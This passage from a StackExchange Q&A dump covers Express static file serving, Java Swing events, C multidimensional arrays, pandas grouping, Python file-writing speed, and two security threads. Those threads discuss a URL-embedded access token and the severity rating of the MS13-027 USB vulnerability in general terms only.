In my code, path to CSS was working fine even with the __dirname concatenation (using path.join), while fetching js was failing.\nAnswer: to serve static files (css,images,js files)just two steps:\n\npass the directory of css files to built in middleware express.static\n<code>var express = require('express');\nvar app = express();\n\/*public is folder in my project directory contains three folders\ncss,image,js\n*\/\n\/\/css =>folder contains css file\n\/\/image=>folder contains images\n\/\/js =>folder contains javascript files\napp.use(express.static( 'public\/css'));\n<\/code>\nto access css files or images just type in url http:\/\/localhost:port\/filename.css ex:http:\/\/localhost:8081\/bootstrap.css\n\nnote: to link css files to html just type<code><link href=\"file_name.css\" rel=\"stylesheet\">\n<\/code>\nif i write this code \n<code>var express = require('express');\nvar app = express();\napp.use('\/css',express.static( 'public\/css'));\n<\/code>\nto access the static files just type in url:localhost:port\/css\/filename.css\nex:http:\/\/localhost:8081\/css\/bootstrap.css\nnote to link css files with html just add the following line\n<code><link href=\"css\/file_name.css\" rel=\"stylesheet\"> \n<\/code>\nAnswer: this one worked for me\n<code>app.use(express.static(path.join(__dirname, 'public')));\n\napp.use('\/img',express.static(path.join(__dirname, 'public\/images')));\n\napp.use('\/shopping-cart\/javascripts',express.static(path.join(__dirname, 'public\/javascripts')));\n\napp.use('\/shopping-cart\/stylesheets',express.static(path.join(__dirname, 'public\/stylesheets')));\n\napp.use('\/user\/stylesheets',express.static(path.join(__dirname, 'public\/stylesheets')));\n\napp.use('\/user\/javascripts',express.static(path.join(__dirname, 'public\/javascripts')));\n<\/code>\nAnswer: Webpack makes things awkward\nAs a supplement to all the other already existing solutions:\nFirst things first: If you base the paths of your files and directories on the <code>cwd<\/code> (current working directory), things should work as usual, as the <code>cwd<\/code> is the folder where you were when you started <code>node<\/code> (or <code>npm start<\/code>, <code>yarn run<\/code> etc).\nHowever...\nIf you are using webpack, <code>__dirname<\/code> behavior will be very different, depending on your <code>node.__dirname<\/code> settings, and your webpack version:\n\nIn Webpack v4, the default behavior for <code>__dirname<\/code> is just <code>\/<\/code>, as documented here.\n\nIn this case, you usually want to add this to your config which makes it act like the default in v5, that is <code>__filename<\/code> and <code>__dirname<\/code> now behave as-is but for the output file:\n<code>module.exports = {\n \/\/ ...\n node: {\n \/\/ generate actual output file information\n \/\/ see: https:\/\/webpack.js.org\/configuration\/node\/#node__filename\n __dirname: false,\n __filename: false,\n }\n};\n<\/code>\n\nThis has also been discussed here.\n\nIn Webpack v5, per the documentation here, the default is already for <code>__filename<\/code> and <code>__dirname<\/code> to behave as-is but for the output file, thereby achieving the same result as the config change for v4.\n\nExample\nFor example, let's say:\n\nyou want to add the static <code>public<\/code> folder\nit is located next to your output (usually <code>dist<\/code>) folder, and you have no sub-folders in <code>dist<\/code>, it's probably going to look like this\n\n<code>const ServerRoot = path.resolve(__dirname \/** dist *\/, '..');\n\/\/ 
...\napp.use(express.static(path.join(ServerRoot, 'public'))\n<\/code>\n(important: again, this is independent of where your source file is, only looks at where your output files are!)\nMore advanced Webpack scenarios\nThings get more complicated if you have multiple entry points in different output directories, as the <code>__dirname<\/code> for the same file might be different for output file (that is each file in <code>entry<\/code>), depending on the location of the output file that this source file was merged into, and what's worse, the same source file might be merged into multiple different output files.\nYou probably want to avoid this kind of scenario scenario, or, if you cannot avoid it, use Webpack to manage and infuse the correct paths for you, possibly via the <code>DefinePlugin<\/code> or the <code>EnvironmentPlugin<\/code>.\nAnswer: The problem with serving <code>__dirname<\/code> is that <code>__dirname<\/code> returns the path of the current file, not the project's file.\nAlso, if you use a dynamic header, each page will look for the static files in a different path and it won't work.\nThe best, for me, is to substitute <code>__dirname<\/code> for <code>process.cwd()<\/code> which ALWAYS donates the path to the project file.\n<code>app.use(express.static(process.cwd() + '\/public'));\n<\/code>\nAnd in your project:\n<code>link rel=\"stylesheet\" href=\"\/styles\/default.css\"\n<\/code>\nSee: What's the difference between process.cwd() vs __dirname?\nAnswer: I was using\n<code>app.use(express.static('public'))\n<\/code>\nWhen there was no file in the public folder with name <code>index.html<\/code>.\nI was getting the following error in the browser:\n\n\"Cannot GET \/\"\n\nWhen I renamed the file to 'index.html', it works fine.\nAnswer: I find my css file and add a route to it:\n<code>app.get('\/css\/MyCSS.css', function(req, res){\n res.sendFile(__dirname + '\/public\/css\/MyCSS.css');\n});\n<\/code>\nThen it seems to work.\nComment: I wouldn't recommend this approach as you should be using ExpressJS's `.use()` and `express.static()` methods to send where you are serving your files. Otherwise you'll have one of these router per file in your public directory and that's a lot of overhead to maintain.\nComment: This is a work around but I do not think it is appropriate. If you have many CSS and JS files, how can you maintain it?\nAnswer: Try accessing it with http:\/\/localhost:3001\/default.css.\n<code> app.use(express.static(__dirname + '\/styles'));\n<\/code>\nYou are actually giving it the name of folder i.e. styles not your suburl.\nAnswer: if your setup\n<code>myApp\n |\n |__ public\n | |\n | |__ stylesheets\n | | |\n | | |__ style.css\n | |\n | |___ img\n | |\n | |__ logo.png\n |\n |__ app.js\n<\/code>\nthen,\nput in app.js \n<code>app.use('\/static', express.static('public'));\n<\/code>\nand refer to your style.css: (in some .pug file):\n<code>link(rel='stylesheet', href='\/static\/stylesheets\/style.css')\n<\/code>\nComment: Why would you introduce a renaming step public -> static? I would say that is just more confusing extra information. 
But then again indirection is usually a good thing...\nAnswer: Try <code>'.\/public'<\/code> instead of <code>__dirname + '\/public'<\/code>.\nSimilarly, try <code>process.cwd() + '\/public'<\/code>.\nSometimes we lose track of the directories we are working with, its good to avoid assuming that files are located where we are telling express where they are.\nSimilarly, avoid assuming that in the depths of dependencies the path is being interpreted the same way at every level.\nComment: 100%. Always try to use `__dirname`, unless you have a case where you don't need to access the project files all the time.\nAnswer: <code>app.use(express.static(__dirname+'\/'));\n<\/code>\nThis worked for me, I tried using a public directory but it didn't work.\nBut in this case, we give access to the whole static files in the directory, hope it helps!\nAnswer: In addition to above, make sure the static file path begins with \/ (ex... \/assets\/css)... to serve static files in any directory above the main directory (\/main)\nComment: Addition to what above? State it in your answer (give credit to the person who posted it, if you have to). SO often changes the order of the answers so that all answers get seen and not the the first few. We don't know what you are talking about.\nAnswer: \nCreate a folder with 'public' name in Nodejs project\nfolder.\nPut index.html file into of Nodejs project folder.\nPut all script and css file into public \nfolder.\nUse <code>app.use( express.static('public'));<\/code>\nand in <code>index.html<\/code> correct path of scripts to <code><script type=\"text\/javascript\" src=\"\/javasrc\/example.js\"><\/script><\/code>\n\nAnd Now all things work fine.\nAnswer: static directory\ncheck the above image(static directory) for dir structure\n<code>const publicDirectoryPath = path.join(__dirname,'..\/public')\napp.use(express.static(publicDirectoryPath))\n\n\/\/ or\n\napp.use(\"\/\", express.static(publicDirectoryPath))\napp.use((req, res, next) => {\nres.sendFile(path.join(publicDirectoryPath,'index.html'))\n<\/code>\nAnswer: In your nodejs file\n<code>const express = require('express');\nconst app = express();\n\napp.use('\/static', express.static('path_to_static_folder'));\n<\/code>\nIn your pug file\n<code>...\nscript(type=\"text\/javascript\", src=\"static\/your_javascript_filename\")\n...\n<\/code>\nNote the \"static\" word. It must be same in nodejs file and pug file.\nAnswer: This is worked for me:\nServer:\n<code>app.use(express.static(\"public\"));\n<\/code>\nClient:\n<code><link href=\"css\/styles.css\" rel=\"stylesheet\">\n<img src=\"images\/210504.png\">\n<\/code>\nAnswer: Just encountered (and solved) a variation on this (node v16.16.0).\nfolder structure:\n<code> project\n apidoc\n src\n index.js (aka server.js, app.js)\n public\n images\n css\n<\/code>\nI am serving static content from 'public':\n<code> app.use(express.static('src\/public'))\n<\/code>\nand wanted to also serve the api docs from apidocs (one folder above the current folder). 
This wouldn't work:\n<code> app.use('\/apidoc', express.static('..\/apidoc')))\n \/\/ this didn't work either\n app.use('\/apidoc', express.static('\/absolute\/path\/to\/apidoc')))\n<\/code>\nThis was the solution:\n<code> import path from 'path'\n import { fileURLToPath } from 'url';\n const __filename = fileURLToPath(import.meta.url);\n const __dirname = path.dirname(__filename);\n\n app.use('\/apidoc', express.static(path.join(__dirname, '..\/apidoc')))\n app.use(express.static('src\/public'))\n<\/code>\nI suspect a path separator issue.\nAnswer: If your folder structure looks like this\n<code>myApp\n |\n |__ public\n | |\n | |__ stylesheets\n | | |\n | | |__ style.css\n | |\n | |___ img\n | |\n | |__ logo.png\n |\n |__ src\n |\n |__ app.js\n \n<\/code>\nuse the line below:\n<code>app.use('\/public', express.static(path.resolve('public')))\n<\/code>\nAnswer: <code>app.use('\/public\/',express.static(path.join('.\/public')));\n<\/code>\nI find this solution after finding it for hours it works for me!!\nAnswer: i just try this code and working\n<code>const exp = require('express');\nconst app = exp();\n\napp.use(exp.static(\"public\"));\n<\/code>\nand working,\nbefore (not working) :\n<code>const express = require('express');\nconst app = express();\napp.use(express.static(\"public\"));\n<\/code>\njust try\nComment: There's absolutely no change in this, lol\nComment: hehe,, this just work for me before, just share my case and i don't know why its work,\n","meta":{"source":"stackoverflow","title":"Express-js can't GET my static files, why?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to fire an ActionEvent from a JPanel\n\nQuestion: I'm trying to repaint a simple massage in a panel by firing an ActionEvent. \nI Have a <code>MessagePanel<\/code> that extends <code>JPanel<\/code>, in which I defined an <code>addActionListener<\/code> method and a <code>processEvent<\/code> method to process the event:\n<code>import java.awt.Graphics;\nimport javax.swing.JPanel; \nimport java.util.*;\nimport java.awt.event.*;\n\npublic class MessagePanel extends JPanel {\n private String message = new Date().toString();\n ArrayList<ActionListener> actionListenerList;\n\n public MessagePanel(String message) {\n this.message = message;\n }\n\n public void setMessage(String message){\n this.message = message;\n }\n\n public void addActionListener(ActionListener listener) {\n if (actionListenerList == null) {\n actionListenerList = new ArrayList<>(2);\n }\n if (!actionListenerList.contains(listener)) {\n actionListenerList.add(listener);\n }\n }\n\n public void removeActionListener(ActionListener listener) {\n if (actionListenerList != null &&\n actionListenerList.contains(listener)) {\n actionListenerList.remove(listener);\n }\n }\n\n public void processEvent(ActionEvent e) {\n ArrayList<ActionListener> list;\n\n synchronized(this) {\n if (actionListenerList == null) {\n return;\n }\n list = (ArrayList<ActionListener>)actionListenerList.clone();\n }\n\n for (int i = 0; i < list.size(); i++) {\n ActionListener listener = (ActionListener)list.get(i);\n listener.actionPerformed(e);\n } \n }\n\n @Override\n protected void paintComponent(Graphics g){\n super.paintComponent(g);\n g.drawString(message, 0, 0);\n }\n}\n<\/code>\nHere's my test class:\n<code>import java.awt.event.*;\nimport javax.swing.*; \nimport java.util.*;\n\npublic TestMessaePanel extends JFrame {\n MessagePanel messagePanel = new MessagePanel(new Date().toString());\n\n public TestMessagePanel() {\n add(messagePanel);\n 
messagePanel.setCentered(true);\n\n messagePanel.addActionListener(new ActionListener(){\n @Override\n public void actionPerformed(ActionEvent e){\n messagePanel.setMessage(new Date().toString());\n }\n });\n }\n\n public static void main(String[] args) {\n JFrame frame = new TestMessagePanelWithActionEvent();\n frame.setSize(300, 200);\n frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n frame.setVisible(true);\n }\n}\n<\/code>\nI'm trying to have the panel repaint the current time with every click of the panel (without using any other event sets) but I can't figure out what event is supposed to fire and invoke my <code>processEvent<\/code> method. I'm not even really sure if I even need the <code>processEvent<\/code>, if I can just implement the process elsewhere. \n<code>EDIT WITH TEXTBOOK PROBLEM (below)\n<\/code>\n(Enable MessagePanel to fire ActionEvent) The MessagePanel class in\nListing 15.7 is a subclass of JPanel; it can fire a MouseEvent,\nKeyEvent, and ComponentEvent, but not an ActionEvent. Modify the\nMessagePanel class so that it can fire an ActionEvent when an instance\nof the MessagePanel class is clicked. Name the new class\nMessagePanelWithActionEvent. Test it with a Java applet that displays\nthe current time in a message panel whenever the message panel is\nclicked, as shown in Figure 36.9.\nAnswer: \nI'm trying to have the panel repaint the current time with every click of the panel (without using any other event sets) \n\nAn ActionListener is to be used only for events that are supposed to trigger it, such as a Timer or an AbstractButton. You should instead use a MouseListener for components that respond to mouse events.\n\nEdit Your assignment:\n\nThe MessagePanel class in Listing 15.7 is a subclass of JPanel; it can fire a MouseEvent, KeyEvent, and ComponentEvent, but not an ActionEvent. Modify the MessagePanel class so that it can fire an ActionEvent when an instance of the MessagePanel class is clicked. Name the new class MessagePanelWithActionEvent. Test it with a Java applet that displays the current time in a message panel whenever the message panel is clicked, as shown in Figure 36.9.\n\nYou're going to have to give your MessagePanel a MouseListener, one that on mousePressed calls your ActionListener(s). \nIn this MouseListener, you're going to have to create an ActionEvent object. Since this is an assignment, I'm not going to show you how to do this but instead will suggest that you go to the ActionEvent API to see what this object needs, and give it try.\nThen you will have to call <code>actionPerformed(...)<\/code> with the ActionEvent object you've just created on any ActionListeners that need to be called.\nComment: Yeah. I'm doing a textbook problem (dealing with implementing listeners an events). The problem clearly states that The JPanel uses, mouse events but not action events. So it asks you to implement the action event into a JPanel.\nComment: @peeskillet: please post the actual assignment verbatim in your question. 
Hopefully it's in English.\nComment: I have posted the problem at the bottom of my post\n","meta":{"source":"stackoverflow","title":"How to fire an ActionEvent from a JPanel","dup_signals":{}},"subset":"stackexchange"} +{"text":"Passing three dimensional arrays into functions in C?\n\nQuestion: What is the best way to pass three dimensional arrays into functions in C?\nAnswer: It is required you have all but the left-most dimension to be defined at compile time.\n<code>#define DIM 5\n\nvoid do_something(float array[][DIM][DIM])\n{\n array[0][0][0] = 0;\n ...\n}\n<\/code>\nAnswer: <code>typedef<\/code> is your friend.\n<code>#include <stdio.h>\ntypedef int dimension1[20]; \/* define dimension1 as array of 20\n elements of type int *\/\ntypedef dimension1 dimension2[10]; \/* define dimension2 as array of 10\n elements of type dimension1 *\/\n\nint foo(dimension2 arr[], size_t siz);\n\nint main(void) {\n dimension2 dimension3[7] = {0}; \/* declare dimension3 as an array of 7\n elements of type dimension2 *\/\n dimension3[4][3][2] = 9999;\n dimension3[4][0][12] = 1;\n dimension3[3][8][18] = 42;\n\n printf(\"%d\\n\", foo(dimension3, 7));\n\n return 0;\n}\n\nint foo(dimension2 arr[], size_t siz) {\n int d1, d2, d3;\n int retval = 0;\n for (d3=0; d3<siz; d3++) {\n for (d2=0; d2<sizeof *arr \/ sizeof **arr; d2++) {\n for (d1=0; d1<sizeof **arr \/ sizeof ***arr; d1++) {\n retval += arr[d3][d2][d1];\n }\n }\n \/* edit: previous answer used definite types for the sizeof argument *\/\n \/\/for (d2=0; d2<sizeof (dimension2) \/ sizeof (dimension1); d2++) {\n \/\/ for (d1=0; d1<sizeof (dimension1) \/ sizeof (int); d1++) {\n \/\/ retval += arr[d3][d2][d1];\n \/\/ }\n \/\/}\n }\n return retval;\n}\n<\/code>\n\nEdit\nI don't like the use of definite types as the argument to <code>sizeof<\/code>.\nI added the way to get the sizes of the (sub-)arrays without directly specifying their types, but rather let the compiler infer the right type from the object definitions.\n\n2nd Edit\nAs Per Eckman notes typedef-ing \"bare\" arrays can be dangerous. Note that in the code above, I'm not passing arrays themselves to the function <code>foo<\/code>. I am passing a pointer to a \"lower level\" array.\n<code>foo()<\/code>, in the code above, accepts a pointer to an object of type <code>dimension2<\/code>. The <code>dimension3<\/code> object is an array of elements of <code>dimension2<\/code> type, not an object of <code>dimension3<\/code> type (which isn't even defined).\nBut remember Per Eckman's note.\nAnswer: Pass them as pointers.\nExample \n<code>int a[N][M][P];\n\nfoo( &a[0][0][0]);\n<\/code>\nwhere foo is \n<code>void foo( int*)\n<\/code>\nYou might need to pass the dimensions as well, so in such case you might need:\n<code>void foo( int*, int D1, int D2, int D3)\n<\/code>\nand call\n<code>foo( &a[0][0][0], N, M, P);\n<\/code>\nComment: Is the [0][0][0] necessary there?\nComment: @Cory, yes it first gets at the first int, and takes it address. That gives the resulting expression type `int*` instead of array pointer like `int(*)[N][M][P]`. This is a good hack in my opinion, it can improve program clarity by not having to deal with constants everywhere. 
But it's formally not guaranteed to work, so use it with care (not sure what could go wrong though).\nComment: @Cory, alternative ways to write that are `&***a`, `a[0][0]` and `**a`.\nAnswer: typedef-ing \"bare\" arrays can be dangerous.\nTry this\n<code>#include <stdio.h>\n\ntypedef char t1[10];\n\nvoid foo(t1 a) {\n t1 b;\n\n printf(\"%d %d\\n\", sizeof a, sizeof b);\n}\n\nint main(void) {\n t1 a;\n foo(a);\n return 0;\n}\n<\/code>\nOne would think that sizeof two variables of the same type would return the same size\nbut not in this case. For this reason it's a good practice to wrap typedef-ed arrays\nin a struct.\n<code>typedef struct {\n char x[10];\n} t1;\n<\/code>\n","meta":{"source":"stackoverflow","title":"Passing three dimensional arrays into functions in C?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Find relationships by timestamp and proximity to respective lat\/long\n\nQuestion: I'm new to python and I have hit a wall with this problem. I have a df with ID's, timestamp and lat \/longs. I need to find ID's that were are near each other by location and time. I've tried groupby with pandas, but the output just lumps everything under each unique ID. Is there a way to pair or group ID's by their proximity to each ID's lat\/longs (<50m) and timestamp (<=24hrs). I appreciate any help. Thanks!\n\nID\nTimestamp\nLatitude\nLongitude\n\n9269\n11\/23\/2021 23:59\n40.3291824\n-105.656204\n\n9269\n11\/19\/2021 23:59\n40.32294108\n-105.8062935\n\n9269\n11\/15\/2021 23:59\n40.13903661\n-105.5979048\n\n9269\n11\/15\/2021 23:39\n40.3291824\n-105.656204\n\n7359\n11\/11\/2021 23:59\n40.13903661\n-105.5979048\n\n7359\n11\/7\/2021 23:59\n40.32294108\n-105.8062935\n\n7359\n11\/7\/2021 23:39\n40.3291824\n-105.656204\n\n2259\n12\/6\/2021 0:02\n40.32294108\n-105.8062935\n\n2259\n12\/2\/2021 0:02\n40.3291824\n-105.656204\n\n2259\n11\/28\/2021 0:02\n40.13903661\n-105.5979048\nComment: You need to start write some code to calculate the distance between the points, and show what you have done so far so we can help.\nComment: Please provide enough code so others can better understand or reproduce the problem.\nAnswer: I will show you some steps that you can use to solve your problem.\n<code>import numpy as np\nimport pandas as pd\n\n# Creating a 2 dimensional numpy array\ndata = np.array([[1, 2,3,4,5,1, 2,3,4,5],[10, 20,30,40,50,10, 20,30,40,50],['s.40','s.50','s.40','s.50','s.40','s.50','s.40','s.50','s.40','s.50']])\n\n# Creating pandas dataframe from numpy array\ndf= pd.DataFrame({'Column1': data[0,:], 'Column2': data[1,:],'Column3': data[2,:]})\n<\/code>\nI create a dataframe from a numpy array.\nIn your dataframe in Timestamp Column you have data and time you need splint it\nand create a new column. 
You can do it as follow in my example:\n<code>def split_function(Column3):\n return Column3.split('.')[1]\n\ndf['split_column']=df.apply(lambda x: split_function(x.Column3), axis=1)\n<\/code>\nIn your case u can use a blank space ' ' to do your split in return Column3.split(' ')[1]\nThan u need garante that ur column have the right type so u can use:\n<code>df['Column1']=pd.to_numeric(df['Column1'])\ndf['Column2']=pd.to_numeric(df['Column2'])\n<\/code>\n(See also to_datetime() and to_timedelta()\nThan u need know how many interval you have, so you can use max and min method to help you find it:\nIn my example :\n<code>df['Column1'].max()\ndf['Column1'].min()\n\ndf['Column2'].max()\ndf['Column2'].min()\n<\/code>\nIt will return\n5\n1\nand\n50\n10\nLet supose i want a interval of 25 based on my Column 2,\nSo i will have 2 groups interval.\nFinally i just need select the rows based on a column condition\nyou can see more info about it here :\nHow do I select rows from a DataFrame based on column values?\n<code>list_dataframe_interval=[]\n\nfor i in range(2):\n print(i*25)\n print(type(i))\n\n df1=df.loc[(df['Column2'] >=i*25) & (df['Column1'] >= i*2.5)]\n df2=df1.loc[(i*25+25 >=df1['Column2']) & (i*2.5+2.5>=df1['Column1'])]\n \n\n \n list_dataframe_interval.append(df2)\n<\/code>\nSo you can see the dataframe in this list\nlist_dataframe_interval[0]\nlist_dataframe_interval[1]\n","meta":{"source":"stackoverflow","title":"Find relationships by timestamp and proximity to respective lat\/long","dup_signals":{}},"subset":"stackexchange"} +{"text":"company is sending md5 string via GET['password'] dangerous?\n\nQuestion: So, this big, reknown company (you all heard off) is sending md5 encrypted strings (with GET key: password) over HTTP. \nI accidentally came over it since I wanted to use jnlp on a non-windows machine. And I am curious. Is it by definition insecure to work like this, or can it be safe when one uses SALT and other stuff alike?\nThe URL looks like this: url\/folder\/page\/?login=[USERNAME]&password=[MD5-String]\nThis URL is also stored in the corresponding .jnlp file.\nI hashed my password to MD5 and it is not the same as the password in the URL.\nFirst and foremost, I am curious. I do not have the skills to exploit this (if it where possible), and don't even want to exploit it. If you guys think I should notify the company in question: I will do so.\nThanks! \nComment: what happens if you log out and use the same URL? Or use it from a different machine? It may be salted with a session ID, or something like that.\nComment: How do you know that the \"MD5-String\" is actually an MD5? Just because it encodes 16 bytes doesn't mean it is an MD5. This **might** have been reasonable (not great, but reasonable) if it was over HTTPS \u2014 it depends what that string is and what is done with it on the server side. Does the string change if you change your password? If you use the same password on a different account?\nComment: Yes this works fine.\nComment: @gilles You are right again. It is not a password. Changing my password didn't result in a different string :P Sorry for the noob question, but can I mark you comment as the answer?\nComment: Sending a password over http, even when hashed with MD5, is a bad idea. It's important to use https.\nComment: Are we not sending passwords over HTTP all day (regardless whether they are hashed)? Forgive my stupidity, but I rarely see HTTPS protocol on normal logins.\nAnswer: \nI am curious. Is it by definition insecure to work like this.\n\nNo. 
Submitting passwords via GET is not fundamentally less secure than submitting them via POST (which is what every other site does). It does mean that the \"password\" is stored unencrypted, but if done right, that password that they're storing not your actual login password but rather a password used specifically for this purpose. In fact, the string you see that you assume is MD5 may actually be the password itself, generated at random. \nA authentication token passed in a URL is problematic because it (a) is easy to copy, even accidentally, (b) is cached, (c) shows up in referrer strings, (d) shows up in logs, (e) offers little in the way of actual authentication. Instead, of doing true authentication, the URL itself is the key.\nOn the other hand, this may be exactly what the company wants. If you want a protected resource to be accessible to anyone who knows the correct URL, then this is how you do it.\nIf they simply called it \"access token\" instead of \"password\", would you suddenly feel better about it?\n\nIf you guys think I should notify the company in question: I will do so.\n\nIf that will make you feel better, then go ahead and tell them. They already know, of course, since they built it. It'd be like notifying someone that their car is blue.\nComment: Well, since it said 'password' I immediately assumed it was a password. As turned out: I was wrong: Changing passwords does not influence the string.\n\nAnd, of course, the last few sentences were only my way of saying I'm not a creepy hacker guy (or probably script kiddy in my case) who wants to exploit and hack into these systems.\n\nThanks for your answer!\n","meta":{"source":"security.stackexchange","title":"company is sending md5 string via GET['password'] dangerous?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Python writelines() and write() huge time difference\n\nQuestion: I was working on a script which reading a folder of files(each of size ranging from 20 MB to 100 MB), modifies some data in each line, and writes back to a copy of the file.\n<code>with open(inputPath, 'r+') as myRead:\n my_list = myRead.readlines()\n new_my_list = clean_data(my_list)\nwith open(outPath, 'w+') as myWrite:\n tempT = time.time()\n myWrite.writelines('\\n'.join(new_my_list) + '\\n')\n print(time.time() - tempT)\nprint(inputPath, 'Cleaning Complete.')\n<\/code>\nOn running this code with a 90 MB file (~900,000 lines), it printed 140 seconds as the time taken to write to the file. Here I used <code>writelines()<\/code>. So I searched for different ways to improve file writing speed, and in most of the articles that I read, it said <code>write()<\/code> and <code>writelines()<\/code> should not show any difference since I am writing a single concatenated string. I also checked the time taken for only the following statement:\n<code>new_string = '\\n'.join(new_my_list) + '\\n'\n<\/code>\nAnd it took only 0.4 seconds, so the large time taken was not because of creating the list.\nJust to try out <code>write()<\/code> I tried this code:\n<code>with open(inputPath, 'r+') as myRead:\n my_list = myRead.readlines()\n new_my_list = clean_data(my_list)\nwith open(outPath, 'w+') as myWrite:\n tempT = time.time()\n myWrite.write('\\n'.join(new_my_list) + '\\n')\n print(time.time() - tempT)\nprint(inputPath, 'Cleaning Complete.')\n<\/code>\nAnd it printed 2.5 seconds. Why is there such a large difference in the file writing time for <code>write()<\/code> and <code>writelines()<\/code> even though it is the same data? 
Is this normal behaviour or is there something wrong in my code? The output file seems to be the same for both cases, so I know that there is no loss in data.\nComment: upvote for finding a twisted way of using writelines with expected result and finding an unexpected caveat.\nComment: Also my clean_data() function strips each row, so extra newlines are removed.\nAnswer: <code>file.writelines()<\/code> expects an iterable of strings. It then proceeds to loop and call <code>file.write()<\/code> for each string in the iterable. In Python, the method does this:\n<code>def writelines(self, lines)\n for line in lines:\n self.write(line)\n<\/code>\nYou are passing in a single large string, and a string is an iterable of strings too. When iterating you get individual characters, strings of length 1. So in effect you are making <code>len(data)<\/code> separate calls to <code>file.write()<\/code>. And that is slow, because you are building up a write buffer a single character at a time.\nDon't pass in a single string to <code>file.writelines()<\/code>. Pass in a list or tuple or other iterable instead.\nYou could send in individual lines with added newline in a generator expression, for example:\n<code> myWrite.writelines(line + '\\n' for line in new_my_list)\n<\/code>\nNow, if you could make <code>clean_data()<\/code> a generator, yielding cleaned lines, you could stream data from the input file, through your data cleaning generator, and out to the output file without using any more memory than is required for the read and write buffers and however much state is needed to clean your lines:\n<code>with open(inputPath, 'r+') as myRead, open(outPath, 'w+') as myWrite:\n myWrite.writelines(line + '\\n' for line in clean_data(myRead))\n<\/code>\nIn addition, I'd consider updating <code>clean_data()<\/code> to emit lines with newlines included.\nComment: `myWrite.writelines('\\n'.join(my_list) + '\\n')` could just be `myWrite.writelines(\"{}\\n\".format(x) for x in my_list)` so that would be even faster; no list to build.\nComment: @Jean-Fran\u00e7oisFabre: which is why I state to pass in a list or tuple *or other iterable*. :-)\nComment: @Jean-Fran\u00e7oisFabre: it may just be a memory-saving measure however, as the buffer still concatenates those lines until it is full. It would help if `clean_data()` was a generator.\nComment: Thanks @MartijnPieters I think I've got a much better understanding of what python considers as iterables now. As of now my clean_data takes a list of all the rows from the input file, makes changes to each row, and returns a list of modified rows. Would it be more efficient to clean each row and write it immediately, or collect the rows into a list and write them all together as I am currently doing in my code?\nComment: @ArjunBalgovind: it'd be more memory efficient to clean each row as you read it, then use `yield` to pass on the result to the next step. Memory efficiency can translate into overall performance improvement if the file is large enough (as memory allocations take time too, and you want to avoid memory contention), and I\/O slowness smoothes over the performance difference for small files.\nComment: So I shouldn't use readlines? So you suggest I change my script to read a line, clean it, and write it to the new file, and repeat this for each line in the input, is that correct?\nComment: @ArjunBalgovind: you can iterate directly over the file object, and efficiently read the file line by line. 
`.readlines()` reads the whole file into memory, but if you don't need random access to any given line to do your data cleaning job, that's entirely overkill and a waste of memory.\nComment: @ArjunBalgovind: and by iterating directly over the file, cleaning a single line at a time, then writing it out to the output file, you achieve the memory benefits I mentioned, yes. This is going to be efficient, because both reading and writing uses buffers (provided you don't process things one character at a time).\nComment: Thanks a lot for all this help :D\nComment: If the cleaning of a single line doesn't need knowledge from previous lines it's also possible to write a function that cleans a single line and use `map()`: `out_file.writelines(map(clean_line, in_file))`. (Assuming `clean_line()` includes the trailing `'\\n'` in its result.)\nAnswer: as a complement to Martijn answer, the best way would be to avoid to build the list using <code>join<\/code> in the first place\nJust pass a generator comprehension to <code>writelines<\/code>, adding the newline in the end: no unnecessary memory allocation and no loop (besides the comprehension)\n<code>myWrite.writelines(\"{}\\n\".format(x) for x in my_list)\n<\/code>\nComment: yes. this is about 30% faster than `write()` at the expense of needing to create `my_list` initially https:\/\/gist.github.com\/chapmanjacobd\/8ec346a7a9f4e78547e7f06043fce9bb\nAnswer: 'write(arg)' method expects string as its argument. So once it calls, it will directly writes. this is the reason it is much faster.\nwhere as if you are using <code>writelines()<\/code> method, it expects list of string as iterator. so even if you are sending data to <code>writelines<\/code>, it assumes that it got iterator and it tries to iterate over it. so since it is an iterator it will take some time to iterate over and write it.\nIs that clear ?\nComment: @ArjunBalgovind: a single string is an iterable of separate characters.\nComment: Yeah, you might want to suggest something like `myWrite.writelines(['\\n'.join(my_list) + '\\n'])`\nComment: But its still a single string isn't it? It will iterate over 1 value? How will that affect write speed?\nComment: @mgilson myWrite.writelines(['\\n'.join(my_list) + '\\n']) worked just as good, as myWrite.write(). I understand now why writelines was so slow.\n","meta":{"source":"stackoverflow","title":"Python writelines() and write() huge time difference","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is the aggregate severity rating of \"Important\" for MS13-027 too low?\n\nQuestion: The Security Bulletin states that the \"Maximum Security Impact\" is \"Elevation of Privilege\"; however, the SRD blog post says code execution is possible. 
Additionally, SRD says \"Other software that enables low-level pass-through of USB device enumeration may open additional avenues of exploitation that do not require direct physical access to the system\".\nFurther, the March Summary indicates that an exploit is likely for this vulnerability.\nGiven all of this, how is the \"Aggregate Severity Rating\" not Critical?\nOnce scenario that I'm now worried about is the maid walking around at night, owning all of the desktops on my trading floor, or any other Windows based corporate device.\nEDIT: Here is the white paper the researcher published on the topic of USB.\nAnswer: I'd say that as @AJHenderson says their rating of Important is down to the requirement for physical access.\nThat said as with any vulnerability the actual risk to an environment needs to be assessed based on the likely threats to systems and their accessibility. In some companies the risk of this attack will be quite low (e.g. datacentre environments where physical access to systems is extremely limited), whereas in others it will be high where access is easy (e.g. any kiosk style environments that allow USB access) or where likely threat actors can get physical access to systems (e.g. financial organisations who may allow contract staff like cleaners physical access to systems (think sumitomo bank))\nUltimately I'd say that the Microsoft rating should just be seen as a starting point for a companies risk assessment and they need to take account of their own environment before deciding on how severely to treat a given issue.\nComment: I wish I could \"accept\" two answers. Your point about risk assessment in the context of the organization is spot on.\nAnswer: I believe it may be due to the fact that it requires local access. Without low level passthrough's to USB, this can't be remotely exploited so the potential risk is fairly limited. High security environments should already have physical security to prevent rogue USB devices being installed and lower security is less of a critical target for a local targeted attack. It's probably the limitation of scope as opposed to the limited potential harm to one particular system.\nWhether that is a good way to measure severity or not is hard to say, but that is my best guess as to where they are coming from.\nComment: @JoeGatt - yes, I made mention of that in my post. Low level pass through of that type is not common. It is mostly seen with things like VMs or things where a virtual driver is used for a USB port. It is a rare case and would require some other means of exploit to make such a low level device on a system that doesn't already have a software device configured to appear as a USB host.\nComment: In the SRD blog post they mention that you do not necessarily need local access. Per the blog post \"Other software that enables low-level pass-through of USB device enumeration may open additional avenues of exploitation that do not require direct physical access to the system\". I interpret that to mean that a malicious executable could crafted to exploit this. So a logged in user must click on something to be 